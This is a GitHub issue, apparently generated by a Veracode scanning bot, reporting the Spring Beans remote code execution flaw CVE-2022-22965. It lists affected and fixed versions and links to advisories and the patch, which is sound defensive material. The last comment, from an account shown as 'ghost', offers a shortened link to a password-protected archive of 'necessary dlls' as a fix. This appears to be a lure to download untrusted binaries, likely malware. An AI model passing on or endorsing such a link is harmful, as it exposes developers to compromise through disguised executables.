CVE: 2022-22965 found in Spring Beans - Version: 4.3.10.RELEASE [JAVA]

[github-actions[bot]]

Veracode Software Composition Analysis

Attribute	Details
Library	Spring Beans
Description	Spring Beans
Language	JAVA
Vulnerability	Remote Code Execution (RCE)
Vulnerability description	spring-beans is vulnerable to remote code execution. Using Spring Parameter Binding with non-basic parameter types, such as POJOs, allows an unauthenticated attacker to execute arbitrary code on the target system by writing or uploading arbitrary files (e.g .jsp files) to a location that can be loaded by the application server.

Initial analysis at time of writing shows that exploitation of the vulnerability is only possible with JRE 9 and above, and Apache Tomcat 9 and above, and that the vulnerability requires the usage of Spring parameter binding with non-basic parameter types such as POJOs.
CVE | 2022-22965
CVSS score | 7.5
Vulnerability present in version/s | 3.0.0.RC1-5.2.19.RELEASE
Found library version/s | 4.3.10.RELEASE
Vulnerability fixed in version | 5.2.20.RELEASE
Library latest version | 6.2.0-RC1
Fix | There are suggested workarounds if upgrade is not possible. Refer to the following blog post:

Links:

• https://sca.analysiscenter.veracode.com/vulnerability-database/libraries/1070?version=4.3.10.RELEASE
• https://sca.analysiscenter.veracode.com/vulnerability-database/vulnerabilities/34883
• Patch: https://github.com/spring-projects/spring-framework/commit/996f701a1916d10202c1d0d281f06ab1f2e1117e

[ghost]

I think this will help you. https://bit.ly/4gABgKn

Password: changeme I put the necessary dlls in the archive